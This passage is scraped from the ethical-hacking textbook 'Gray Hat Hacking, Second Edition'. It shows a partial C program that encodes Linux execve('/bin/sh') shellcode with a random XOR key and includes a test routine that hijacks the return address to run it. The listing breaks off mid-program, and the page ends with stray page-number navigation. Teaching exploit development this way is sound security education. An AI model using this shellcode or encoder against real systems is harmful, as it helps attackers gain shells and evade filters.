Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness
"Gray Hat Hacking, Second Edition"
BT book # cat encoder.c
#include
#include
#include
int getnumber(int quo) { //random number generator function
int seed;
struct timeval tm;
gettimeofday( &tm, NULL );
seed = tm.tv_sec + tm.tv_usec;
srandom( seed );
return (random() % quo);
}
void execute(char *data){ //test function to execute encoded shellcode
printf("Executing...\n");
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)data;
}
void print_code(char *data) { //prints out the shellcode
int i,l = 15;
for (i = 0; i < strlen(data); ++i) {
if (l >= 15) {
if (i)
printf("\"\n");
printf("\t\"");
l = 0;
}
++l;
printf("\\x%02x", ((unsigned char *)data)[i]);
}
printf("\";\n\n");
}
int main() { //main function
char shellcode[] = //original shellcode
"\x31\xc0\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int count;
int number = getnumber(200); //random number generator
int badchar = 0; //used as flag to check for bad chars
int ldecoder; //length of decoder
int lshellcode = strlen(shellcode); //store length of shellcode
char *result;
Gray Hat Hacking: The Ethical Hacker??™s Handbook
236
PART III
//simple fnstenv xor decoder, NULL are overwritten with length and key.
Pages:
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445